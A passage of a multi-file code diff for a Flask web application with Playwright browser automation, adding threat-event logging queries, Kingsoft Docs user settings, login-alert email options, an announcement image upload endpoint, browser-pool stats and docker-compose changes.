title TEXT NOT NULL, title TEXT NOT NULL,
content TEXT NOT NULL, content TEXT NOT NULL,
image_url TEXT,
is_active INTEGER DEFAULT 1, is_active INTEGER DEFAULT 1,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
@@ -271,6 +365,26 @@ def ensure_schema(conn) -> None:
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_fingerprints_user ON login_fingerprints(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_fingerprints_user ON login_fingerprints(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_created_at ON threat_events(created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_ip ON threat_events(ip)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_user_id ON threat_events(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_type ON threat_events(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_score ON ip_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_updated_at ON ip_risk_scores(updated_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_score ON user_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_updated_at ON user_risk_scores(updated_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_active ON ip_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_expires ON ip_blacklist(expires_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_type ON threat_signatures(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_active ON threat_signatures(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_user_id ON accounts(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_user_id ON accounts(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_username ON accounts(username)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_username ON accounts(username)")
@@ -279,9 +393,6 @@ def ensure_schema(conn) -> None:
cursor.execute("CREATE INDEX IF NOT EXISTS idx_task_logs_created_at ON task_logs(created_at)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_task_logs_created_at ON task_logs(created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_task_logs_user_date ON task_logs(user_id, created_at)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_task_logs_user_date ON task_logs(user_id, created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_password_reset_status ON password_reset_requests(status)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_password_reset_user_id ON password_reset_requests(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_user_id ON bug_feedbacks(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_user_id ON bug_feedbacks(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_status ON bug_feedbacks(status)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_status ON bug_feedbacks(status)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_created_at ON bug_feedbacks(created_at)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_created_at ON bug_feedbacks(created_at)")

View File

@@ -2,10 +2,12 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from __future__ import annotations from __future__ import annotations
from datetime import timedelta
from typing import Any, Optional
from typing import Dict from typing import Dict
import db_pool import db_pool
from db.utils import get_cst_now_str from db.utils import get_cst_now, get_cst_now_str
def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict[str, bool]: def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict[str, bool]:
@@ -74,3 +76,217 @@ def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict
conn.commit() conn.commit()
return {"new_device": new_device, "new_ip": new_ip} return {"new_device": new_device, "new_ip": new_ip}
def get_threat_events_count(hours: int = 24) -> int:
"""获取指定时间内的威胁事件数。"""
try:
hours_int = max(0, int(hours))
except Exception:
hours_int = 24
if hours_int <= 0:
return 0
start_time = (get_cst_now() - timedelta(hours=hours_int)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT COUNT(*) AS cnt FROM threat_events WHERE created_at >= ?", (start_time,))
row = cursor.fetchone()
try:
return int(row["cnt"] if row else 0)
except Exception:
return 0
def _build_threat_events_where_clause(filters: Optional[dict]) -> tuple[str, list[Any]]:
clauses: list[str] = []
params: list[Any] = []
if not isinstance(filters, dict):
return "", []
event_type = filters.get("event_type") or filters.get("threat_type")
if event_type:
raw = str(event_type).strip()
types = [t.strip()[:64] for t in raw.split(",") if t.strip()]
if len(types) == 1:
clauses.append("threat_type = ?")
params.append(types[0])
elif types:
placeholders = ", ".join(["?"] * len(types))
clauses.append(f"threat_type IN ({placeholders})")
params.extend(types)
severity = filters.get("severity")
if severity is not None and str(severity).strip():
sev = str(severity).strip().lower()
if "-" in sev:
parts = [p.strip() for p in sev.split("-", 1)]
try:
min_score = int(parts[0])
max_score = int(parts[1])
clauses.append("score >= ? AND score <= ?")
params.extend([min_score, max_score])
except Exception:
pass
elif sev.isdigit():
clauses.append("score >= ?")
params.append(int(sev))
elif sev in {"high", "critical"}:
clauses.append("score >= ?")
params.append(80)
elif sev in {"medium", "med"}:
clauses.append("score >= ? AND score < ?")
params.extend([50, 80])
elif sev in {"low", "info"}:
clauses.append("score < ?")
params.append(50)
ip = filters.get("ip")
if ip is not None and str(ip).strip():
ip_text = str(ip).strip()[:64]
clauses.append("ip = ?")
params.append(ip_text)
user_id = filters.get("user_id")
if user_id is not None and str(user_id).strip():
try:
user_id_int = int(user_id)
except Exception:
user_id_int = None
if user_id_int is not None:
clauses.append("user_id = ?")
params.append(user_id_int)
if not clauses:
return "", []
return " WHERE " + " AND ".join(clauses), params
def get_threat_events_list(page: int, per_page: int, filters: Optional[dict] = None) -> dict:
"""分页获取威胁事件。"""
try:
page_i = max(1, int(page))
except Exception:
page_i = 1
try:
per_page_i = int(per_page)
except Exception:
per_page_i = 20
per_page_i = max(1, min(200, per_page_i))
where_sql, params = _build_threat_events_where_clause(filters)
offset = (page_i - 1) * per_page_i
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(f"SELECT COUNT(*) AS cnt FROM threat_events{where_sql}", tuple(params))
row = cursor.fetchone()
total = int(row["cnt"]) if row else 0
cursor.execute(
f"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
{where_sql}
ORDER BY created_at DESC, id DESC
LIMIT ? OFFSET ?
""",
tuple(params + [per_page_i, offset]),
)
items = [dict(r) for r in cursor.fetchall()]
return {"page": page_i, "per_page": per_page_i, "total": total, "items": items, "filters": filters or {}}
def get_ip_threat_history(ip: str, limit: int = 50) -> list[dict]:
"""获取IP的威胁历史最近limit条"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return []
try:
limit_i = max(1, min(200, int(limit)))
except Exception:
limit_i = 50
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
WHERE ip = ?
ORDER BY created_at DESC, id DESC
LIMIT ?
""",
(ip_text, limit_i),
)
return [dict(r) for r in cursor.fetchall()]
def get_user_threat_history(user_id: int, limit: int = 50) -> list[dict]:
"""获取用户的威胁历史最近limit条"""
if user_id is None:
return []
try:
user_id_int = int(user_id)
except Exception:
return []
try:
limit_i = max(1, min(200, int(limit)))
except Exception:
limit_i = 50
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
WHERE user_id = ?
ORDER BY created_at DESC, id DESC
LIMIT ?
""",
(user_id_int, limit_i),
)
return [dict(r) for r in cursor.fetchall()]

View File

@@ -217,6 +217,39 @@ def get_user_by_id(user_id):
return dict(user) if user else None return dict(user) if user else None
def get_user_kdocs_settings(user_id):
"""获取用户的金山文档配置"""
user = get_user_by_id(user_id)
if not user:
return None
return {
"kdocs_unit": user.get("kdocs_unit") or "",
"kdocs_auto_upload": 1 if user.get("kdocs_auto_upload") else 0,
}
def update_user_kdocs_settings(user_id, *, kdocs_unit=None, kdocs_auto_upload=None) -> bool:
"""更新用户的金山文档配置"""
updates = []
params = []
if kdocs_unit is not None:
updates.append("kdocs_unit = ?")
params.append(kdocs_unit)
if kdocs_auto_upload is not None:
updates.append("kdocs_auto_upload = ?")
params.append(kdocs_auto_upload)
if not updates:
return False
params.append(user_id)
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(f"UPDATE users SET {', '.join(updates)} WHERE id = ?", params)
conn.commit()
return cursor.rowcount > 0
def get_user_by_username(username): def get_user_by_username(username):
"""根据用户名获取用户""" """根据用户名获取用户"""
with db_pool.get_db() as conn: with db_pool.get_db() as conn:

View File

@@ -7,60 +7,48 @@ services:
ports: ports:
- "51232:51233" - "51232:51233"
volumes: volumes:
- ./data:/app/data # 数据库持久化 - ./data:/app/data
- ./logs:/app/logs # 日志持久化 - ./logs:/app/logs
- ./截图:/app/截图 # 截图持久化 - ./截图:/app/截图
- ./playwright:/ms-playwright # Playwright浏览器持久化避免重复下载 - ./playwright:/ms-playwright
- /etc/localtime:/etc/localtime:ro # 时区同步 - /etc/localtime:/etc/localtime:ro
- ./static:/app/static # 静态文件(实时更新) - ./static:/app/static
- ./templates:/app/templates # 模板文件(实时更新) - ./templates:/app/templates
- ./app.py:/app/app.py # 主程序(实时更新) - ./app.py:/app/app.py
- ./database.py:/app/database.py # 数据库模块(实时更新) - ./database.py:/app/database.py
# 代码热更新
- ./services:/app/services
- ./routes:/app/routes
- ./db:/app/db
- ./security:/app/security
- ./realtime:/app/realtime
- ./api_browser.py:/app/api_browser.py
- ./app_config.py:/app/app_config.py
- ./app_logger.py:/app/app_logger.py
- ./app_security.py:/app/app_security.py
- ./browser_pool_worker.py:/app/browser_pool_worker.py
- ./crypto_utils.py:/app/crypto_utils.py
- ./db_pool.py:/app/db_pool.py
- ./email_service.py:/app/email_service.py
- ./password_utils.py:/app/password_utils.py
- ./playwright_automation.py:/app/playwright_automation.py
- ./task_checkpoint.py:/app/task_checkpoint.py
dns: dns:
- 223.5.5.5 - 223.5.5.5
- 114.114.114.114 - 114.114.114.114
- 119.29.29.29
environment: environment:
- TZ=Asia/Shanghai - TZ=Asia/Shanghai
- PYTHONUNBUFFERED=1 - PYTHONUNBUFFERED=1
- PLAYWRIGHT_BROWSERS_PATH=/ms-playwright - PLAYWRIGHT_BROWSERS_PATH=/ms-playwright
- PLAYWRIGHT_DOWNLOAD_HOST=https://npmmirror.com/mirrors/playwright
# Flask 配置
- FLASK_ENV=production - FLASK_ENV=production
- FLASK_DEBUG=false
# 服务器配置
- SERVER_HOST=0.0.0.0 - SERVER_HOST=0.0.0.0
- SERVER_PORT=51233 - SERVER_PORT=51233
# 数据库配置
- DB_FILE=data/app_data.db
- DB_POOL_SIZE=5
# 并发控制配置
- MAX_CONCURRENT_GLOBAL=2
- MAX_CONCURRENT_PER_ACCOUNT=1
- MAX_CONCURRENT_CONTEXTS=100
# 安全配置
- SESSION_LIFETIME_HOURS=24
- SESSION_COOKIE_SECURE=false
- MAX_CAPTCHA_ATTEMPTS=5
- MAX_IP_ATTEMPTS_PER_HOUR=10
# 日志配置
- LOG_LEVEL=INFO - LOG_LEVEL=INFO
- LOG_FILE=logs/app.log
- API_DIAGNOSTIC_LOG=0
- API_DIAGNOSTIC_SLOW_MS=0
# 知识管理平台配置
- ZSGL_LOGIN_URL=https://postoa.aidunsoft.com/admin/login.aspx
- ZSGL_INDEX_URL_PATTERN=index.aspx
- PAGE_LOAD_TIMEOUT=60000
restart: unless-stopped restart: unless-stopped
shm_size: 2gb # 为Chromium分配共享内存 shm_size: 2gb
mem_limit: 4g
# 内存和CPU资源限制 mem_reservation: 2g
mem_limit: 4g # 硬限制:最大4GB内存 cpus: '2.0'
mem_reservation: 2g # 软限制:预留2GB
cpus: '2.0' # 限制使用2个CPU核心
# 健康检查(可选)
healthcheck: healthcheck:
test: ["CMD-SHELL", "curl -f http://localhost:51233 || exit 1"] test: ["CMD-SHELL", "curl -f http://localhost:51233 || exit 1"]
interval: 5m interval: 5m

View File

@@ -154,6 +154,7 @@ def init_email_tables():
enabled INTEGER DEFAULT 0, enabled INTEGER DEFAULT 0,
failover_enabled INTEGER DEFAULT 1, failover_enabled INTEGER DEFAULT 1,
register_verify_enabled INTEGER DEFAULT 0, register_verify_enabled INTEGER DEFAULT 0,
login_alert_enabled INTEGER DEFAULT 1,
task_notify_enabled INTEGER DEFAULT 0, task_notify_enabled INTEGER DEFAULT 0,
base_url TEXT DEFAULT '', base_url TEXT DEFAULT '',
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
@@ -244,8 +245,8 @@ def get_email_settings() -> Dict[str, Any]:
with db_pool.get_db() as conn: with db_pool.get_db() as conn:
cursor = conn.cursor() cursor = conn.cursor()
cursor.execute(""" cursor.execute("""
SELECT enabled, failover_enabled, register_verify_enabled, base_url, SELECT enabled, failover_enabled, register_verify_enabled, login_alert_enabled,
task_notify_enabled, updated_at base_url, task_notify_enabled, updated_at
FROM email_settings WHERE id = 1 FROM email_settings WHERE id = 1
""") """)
row = cursor.fetchone() row = cursor.fetchone()
@@ -254,14 +255,16 @@ def get_email_settings() -> Dict[str, Any]:
'enabled': bool(row[0]), 'enabled': bool(row[0]),
'failover_enabled': bool(row[1]), 'failover_enabled': bool(row[1]),
'register_verify_enabled': bool(row[2]) if row[2] is not None else False, 'register_verify_enabled': bool(row[2]) if row[2] is not None else False,
'base_url': row[3] or '', 'login_alert_enabled': bool(row[3]) if row[3] is not None else True,
'task_notify_enabled': bool(row[4]) if row[4] is not None else False, 'base_url': row[4] or '',
'updated_at': row[5] 'task_notify_enabled': bool(row[5]) if row[5] is not None else False,
'updated_at': row[6]
} }
return { return {
'enabled': False, 'enabled': False,
'failover_enabled': True, 'failover_enabled': True,
'register_verify_enabled': False, 'register_verify_enabled': False,
'login_alert_enabled': True,
'base_url': '', 'base_url': '',
'task_notify_enabled': False, 'task_notify_enabled': False,
'updated_at': None 'updated_at': None
@@ -272,6 +275,7 @@ def update_email_settings(
enabled: bool, enabled: bool,
failover_enabled: bool, failover_enabled: bool,
register_verify_enabled: bool = None, register_verify_enabled: bool = None,
login_alert_enabled: bool = None,
base_url: str = None, base_url: str = None,
task_notify_enabled: bool = None task_notify_enabled: bool = None
) -> bool: ) -> bool:
@@ -287,6 +291,10 @@ def update_email_settings(
updates.append('register_verify_enabled = ?') updates.append('register_verify_enabled = ?')
params.append(int(register_verify_enabled)) params.append(int(register_verify_enabled))
if login_alert_enabled is not None:
updates.append('login_alert_enabled = ?')
params.append(int(login_alert_enabled))
if base_url is not None: if base_url is not None:
updates.append('base_url = ?') updates.append('base_url = ?')
params.append(base_url) params.append(base_url)

View File

@@ -424,7 +424,7 @@ class PlaywrightAutomation:
# 等待跳转 # 等待跳转
# self.log("等待登录处理...") # 精简日志 # self.log("等待登录处理...") # 精简日志
self.page.wait_for_load_state('networkidle', timeout=10000) # 优化为10秒 self.page.wait_for_load_state('networkidle', timeout=30000) # 增加到30秒
# 检查登录结果 # 检查登录结果
current_url = self.page.url current_url = self.page.url
@@ -823,7 +823,7 @@ class PlaywrightAutomation:
self.log(f"导航到 '{browse_type}' 页面...") self.log(f"导航到 '{browse_type}' 页面...")
try: try:
# 等待页面完全加载 # 等待页面完全加载
time.sleep(0.5) time.sleep(2)
self.log(f"当前URL: {self.main_page.url}") self.log(f"当前URL: {self.main_page.url}")
except Exception as e: except Exception as e:
self.log(f"获取URL失败: {str(e)}") self.log(f"获取URL失败: {str(e)}")
@@ -835,7 +835,7 @@ class PlaywrightAutomation:
# 如果只是导航(用于截图),切换完成后直接返回 # 如果只是导航(用于截图),切换完成后直接返回
if navigate_only: if navigate_only:
time.sleep(0.3) # 等待页面稳定 time.sleep(1) # 等待页面稳定
result.success = True result.success = True
return result return result
@@ -867,21 +867,27 @@ class PlaywrightAutomation:
except Exception: # Bug fix: 明确捕获Exception except Exception: # Bug fix: 明确捕获Exception
self.log("等待表格超时,继续尝试...") self.log("等待表格超时,继续尝试...")
# 等待页面网络空闲确保AJAX加载完成 # 额外等待确保AJAX内容加载完成
try: # 第一页等待更长时间因为是首次加载并发时尤其<E5B0A4><E585B6><EFBFBD>
self.page.wait_for_load_state('networkidle', timeout=5000) if current_page == 1 and total_items == 0:
except Exception: time.sleep(3.0)
pass # 超时继续,不阻塞 else:
time.sleep(1.0)
# 获取内容行数量(简化重试2次快速检测 # 获取内容行数量(带重试机制避免AJAX加载慢导致误判
# 第一页使用更多重试次数8次×3秒=24秒处理高并发时的慢加载
# 后续页使用3次×1.5秒=4.5秒
max_retries = 8 if (current_page == 1 and total_items == 0) else 3
retry_wait = 3.0 if (current_page == 1 and total_items == 0) else 1.5
rows_count = 0 rows_count = 0
for retry in range(2): for retry in range(max_retries):
rows_locator = self.page.locator("//table[@class='ltable']/tbody/tr[position()>1 and count(td)>=5]") rows_locator = self.page.locator("//table[@class='ltable']/tbody/tr[position()>1 and count(td)>=5]")
rows_count = rows_locator.count() rows_count = rows_locator.count()
if rows_count > 0: if rows_count > 0:
break break
if retry == 0: if retry < max_retries - 1:
time.sleep(0.5) # 仅重试一次等待0.5秒 self.log(f"未检测到内容,等待后重试... ({retry+1}/{max_retries})")
time.sleep(retry_wait)
if rows_count == 0: if rows_count == 0:
self.log("当前页面没有内容") self.log("当前页面没有内容")

View File

@@ -2,7 +2,6 @@ flask==3.0.0
flask-socketio==5.3.5 flask-socketio==5.3.5
flask-login==0.6.3 flask-login==0.6.3
python-socketio==5.10.0 python-socketio==5.10.0
playwright==1.40.0
schedule==1.2.0 schedule==1.2.0
psutil==5.9.6 psutil==5.9.6
pytz==2024.1 pytz==2024.1
@@ -10,6 +9,6 @@ bcrypt==4.0.1
requests==2.31.0 requests==2.31.0
python-dotenv==1.0.0 python-dotenv==1.0.0
beautifulsoup4==4.12.2 beautifulsoup4==4.12.2
nest_asyncio
cryptography>=41.0.0 cryptography>=41.0.0
Pillow>=10.0.0 Pillow>=10.0.0
playwright==1.42.0

View File

@@ -5,6 +5,7 @@ from __future__ import annotations
def register_blueprints(app) -> None: def register_blueprints(app) -> None:
from routes.admin_api import admin_api_bp from routes.admin_api import admin_api_bp
from routes.admin_api import security_bp as admin_security_bp
from routes.api_accounts import api_accounts_bp from routes.api_accounts import api_accounts_bp
from routes.api_auth import api_auth_bp from routes.api_auth import api_auth_bp
from routes.api_schedules import api_schedules_bp from routes.api_schedules import api_schedules_bp
@@ -21,3 +22,6 @@ def register_blueprints(app) -> None:
app.register_blueprint(api_screenshots_bp) app.register_blueprint(api_screenshots_bp)
app.register_blueprint(api_schedules_bp) app.register_blueprint(api_schedules_bp)
app.register_blueprint(admin_api_bp) app.register_blueprint(admin_api_bp)
# Security admin APIs (support both /api/admin/* and /yuyx/api/admin/*)
app.register_blueprint(admin_security_bp)
app.register_blueprint(admin_security_bp, url_prefix="/yuyx", name="admin_security_yuyx")

View File

@@ -8,4 +8,6 @@ admin_api_bp = Blueprint("admin_api", __name__, url_prefix="/yuyx/api")
# Import side effects: register routes on blueprint # Import side effects: register routes on blueprint
from routes.admin_api import core as _core # noqa: F401 from routes.admin_api import core as _core # noqa: F401
from routes.admin_api import update as _update # noqa: F401
# Export security blueprint for app registration
from routes.admin_api.security import security_bp # noqa: F401

View File

@@ -3,6 +3,8 @@
from __future__ import annotations from __future__ import annotations
import os import os
import posixpath
import secrets
import threading import threading
import time import time
from datetime import datetime from datetime import datetime
@@ -15,7 +17,9 @@ from app_logger import get_logger
from app_security import ( from app_security import (
get_rate_limit_ip, get_rate_limit_ip,
is_safe_outbound_url, is_safe_outbound_url,
is_safe_path,
require_ip_not_locked, require_ip_not_locked,
sanitize_filename,
validate_email, validate_email,
validate_password, validate_password,
) )
@@ -48,6 +52,36 @@ from services.time_utils import BEIJING_TZ, get_beijing_now
logger = get_logger("app") logger = get_logger("app")
config = get_config() config = get_config()
_server_cpu_percent_lock = threading.Lock()
_server_cpu_percent_last: float | None = None
_server_cpu_percent_last_ts = 0.0
def _get_server_cpu_percent() -> float:
import psutil
global _server_cpu_percent_last, _server_cpu_percent_last_ts
now = time.time()
with _server_cpu_percent_lock:
if _server_cpu_percent_last is not None and (now - _server_cpu_percent_last_ts) < 0.5:
return _server_cpu_percent_last
try:
if _server_cpu_percent_last is None:
cpu_percent = float(psutil.cpu_percent(interval=0.1))
else:
cpu_percent = float(psutil.cpu_percent(interval=None))
except Exception:
cpu_percent = float(_server_cpu_percent_last or 0.0)
if cpu_percent < 0:
cpu_percent = 0.0
_server_cpu_percent_last = cpu_percent
_server_cpu_percent_last_ts = now
return cpu_percent
def _admin_reauth_required() -> bool: def _admin_reauth_required() -> bool:
try: try:
@@ -61,6 +95,24 @@ def _require_admin_reauth():
return jsonify({"error": "需要二次确认", "code": "reauth_required"}), 401 return jsonify({"error": "需要二次确认", "code": "reauth_required"}), 401
return None return None
def _get_upload_dir():
rel_dir = getattr(config, "ANNOUNCEMENT_IMAGE_DIR", "static/announcements")
if not is_safe_path(current_app.root_path, rel_dir):
rel_dir = "static/announcements"
abs_dir = os.path.join(current_app.root_path, rel_dir)
os.makedirs(abs_dir, exist_ok=True)
return abs_dir, rel_dir
def _get_file_size(file_storage):
try:
file_storage.stream.seek(0, os.SEEK_END)
size = file_storage.stream.tell()
file_storage.stream.seek(0)
return size
except Exception:
return None
@admin_api_bp.route("/debug-config", methods=["GET"]) @admin_api_bp.route("/debug-config", methods=["GET"])
@admin_required @admin_required
@@ -199,6 +251,42 @@ def admin_reauth():
# ==================== 公告管理API管理员 ==================== # ==================== 公告管理API管理员 ====================
@admin_api_bp.route("/announcements/upload_image", methods=["POST"])
@admin_required
def admin_upload_announcement_image():
"""上传公告图片返回可访问URL"""
file = request.files.get("file")
if not file or not file.filename:
return jsonify({"error": "请选择图片"}), 400
filename = sanitize_filename(file.filename)
ext = os.path.splitext(filename)[1].lower()
allowed_exts = getattr(config, "ALLOWED_ANNOUNCEMENT_IMAGE_EXTENSIONS", {".png", ".jpg", ".jpeg"})
if not ext or ext not in allowed_exts:
return jsonify({"error": "不支持的图片格式"}), 400
if file.mimetype and not str(file.mimetype).startswith("image/"):
return jsonify({"error": "文件类型无效"}), 400
size = _get_file_size(file)
max_size = int(getattr(config, "MAX_ANNOUNCEMENT_IMAGE_SIZE", 5 * 1024 * 1024))
if size is not None and size > max_size:
max_mb = max_size // 1024 // 1024
return jsonify({"error": f"图片大小不能超过{max_mb}MB"}), 400
abs_dir, rel_dir = _get_upload_dir()
token = secrets.token_hex(6)
name = f"announcement_{int(time.time())}_{token}{ext}"
save_path = os.path.join(abs_dir, name)
file.save(save_path)
static_root = os.path.join(current_app.root_path, "static")
rel_to_static = os.path.relpath(abs_dir, static_root)
if rel_to_static.startswith(".."):
rel_to_static = "announcements"
url_path = posixpath.join(rel_to_static.replace(os.sep, "/"), name)
return jsonify({"success": True, "url": url_for("serve_static", filename=url_path)})
@admin_api_bp.route("/announcements", methods=["GET"]) @admin_api_bp.route("/announcements", methods=["GET"])
@admin_required @admin_required
def admin_get_announcements(): def admin_get_announcements():
@@ -221,9 +309,13 @@ def admin_create_announcement():
data = request.json or {} data = request.json or {}
title = (data.get("title") or "").strip() title = (data.get("title") or "").strip()
content = (data.get("content") or "").strip() content = (data.get("content") or "").strip()
image_url = (data.get("image_url") or "").strip()
is_active = bool(data.get("is_active", True)) is_active = bool(data.get("is_active", True))
announcement_id = database.create_announcement(title, content, is_active=is_active) if image_url and len(image_url) > 1000:
return jsonify({"error": "图片地址过长"}), 400
announcement_id = database.create_announcement(title, content, image_url=image_url, is_active=is_active)
if not announcement_id: if not announcement_id:
return jsonify({"error": "标题和内容不能为空"}), 400 return jsonify({"error": "标题和内容不能为空"}), 400
@@ -317,6 +409,71 @@ def get_system_stats():
return jsonify(stats) return jsonify(stats)
@admin_api_bp.route("/browser_pool/stats", methods=["GET"])
@admin_required
def get_browser_pool_stats():
"""获取截图线程池状态"""
try:
from browser_pool_worker import get_browser_worker_pool
pool = get_browser_worker_pool()
stats = pool.get_stats() or {}
worker_details = []
for w in stats.get("workers") or []:
last_ts = float(w.get("last_active_ts") or 0)
last_active_at = None
if last_ts > 0:
try:
last_active_at = datetime.fromtimestamp(last_ts, tz=BEIJING_TZ).strftime("%Y-%m-%d %H:%M:%S")
except Exception:
last_active_at = None
created_ts = w.get("browser_created_at")
created_at = None
if created_ts:
try:
created_at = datetime.fromtimestamp(float(created_ts), tz=BEIJING_TZ).strftime("%Y-%m-%d %H:%M:%S")
except Exception:
created_at = None
worker_details.append(
{
"worker_id": w.get("worker_id"),
"idle": bool(w.get("idle")),
"has_browser": bool(w.get("has_browser")),
"total_tasks": int(w.get("total_tasks") or 0),
"failed_tasks": int(w.get("failed_tasks") or 0),
"browser_use_count": int(w.get("browser_use_count") or 0),
"browser_created_at": created_at,
"browser_created_ts": created_ts,
"last_active_at": last_active_at,
"last_active_ts": last_ts,
"thread_alive": bool(w.get("thread_alive")),
}
)
total_workers = len(worker_details) if worker_details else int(stats.get("pool_size") or 0)
return jsonify(
{
"total_workers": total_workers,
"active_workers": int(stats.get("busy_workers") or 0),
"idle_workers": int(stats.get("idle_workers") or 0),
"queue_size": int(stats.get("queue_size") or 0),
"workers": worker_details,
"summary": {
"total_tasks": int(stats.get("total_tasks") or 0),
"failed_tasks": int(stats.get("failed_tasks") or 0),
"success_rate": stats.get("success_rate"),
},
"server_time_cst": get_beijing_now().strftime("%Y-%m-%d %H:%M:%S"),
}
)
except Exception as e:
logger.exception(f"[AdminAPI] 获取截图线程池状态失败: {e}")
return jsonify({"error": "获取截图线程池状态失败"}), 500
@admin_api_bp.route("/docker_stats", methods=["GET"]) @admin_api_bp.route("/docker_stats", methods=["GET"])
@admin_required @admin_required
def get_docker_stats(): def get_docker_stats():
@@ -510,9 +667,21 @@ def update_system_config_api():
schedule_weekdays = data.get("schedule_weekdays") schedule_weekdays = data.get("schedule_weekdays")
new_max_concurrent_per_account = data.get("max_concurrent_per_account") new_max_concurrent_per_account = data.get("max_concurrent_per_account")
new_max_screenshot_concurrent = data.get("max_screenshot_concurrent") new_max_screenshot_concurrent = data.get("max_screenshot_concurrent")
enable_screenshot = data.get("enable_screenshot")
auto_approve_enabled = data.get("auto_approve_enabled") auto_approve_enabled = data.get("auto_approve_enabled")
auto_approve_hourly_limit = data.get("auto_approve_hourly_limit") auto_approve_hourly_limit = data.get("auto_approve_hourly_limit")
auto_approve_vip_days = data.get("auto_approve_vip_days") auto_approve_vip_days = data.get("auto_approve_vip_days")
kdocs_enabled = data.get("kdocs_enabled")
kdocs_doc_url = data.get("kdocs_doc_url")
kdocs_default_unit = data.get("kdocs_default_unit")
kdocs_sheet_name = data.get("kdocs_sheet_name")
kdocs_sheet_index = data.get("kdocs_sheet_index")
kdocs_unit_column = data.get("kdocs_unit_column")
kdocs_image_column = data.get("kdocs_image_column")
kdocs_admin_notify_enabled = data.get("kdocs_admin_notify_enabled")
kdocs_admin_notify_email = data.get("kdocs_admin_notify_email")
kdocs_row_start = data.get("kdocs_row_start")
kdocs_row_end = data.get("kdocs_row_end")
if max_concurrent is not None: if max_concurrent is not None:
if not isinstance(max_concurrent, int) or max_concurrent < 1: if not isinstance(max_concurrent, int) or max_concurrent < 1:
@@ -524,7 +693,13 @@ def update_system_config_api():
if new_max_screenshot_concurrent is not None: if new_max_screenshot_concurrent is not None:
if not isinstance(new_max_screenshot_concurrent, int) or new_max_screenshot_concurrent < 1: if not isinstance(new_max_screenshot_concurrent, int) or new_max_screenshot_concurrent < 1:
return jsonify({"error": "截图并发数必须大于0建议根据服务器配置设置每个浏览器约占用200MB内存"}), 400 return jsonify({"error": "截图并发数必须大于0建议根据服务器配置设置wkhtmltoimage 资源占用较低"}), 400
if enable_screenshot is not None:
if isinstance(enable_screenshot, bool):
enable_screenshot = 1 if enable_screenshot else 0
if enable_screenshot not in (0, 1):
return jsonify({"error": "截图开关必须是0或1"}), 400
if schedule_time is not None: if schedule_time is not None:
import re import re
@@ -554,6 +729,82 @@ def update_system_config_api():
if not isinstance(auto_approve_vip_days, int) or auto_approve_vip_days < 0: if not isinstance(auto_approve_vip_days, int) or auto_approve_vip_days < 0:
return jsonify({"error": "注册赠送VIP天数不能为负数"}), 400 return jsonify({"error": "注册赠送VIP天数不能为负数"}), 400
if kdocs_enabled is not None:
if isinstance(kdocs_enabled, bool):
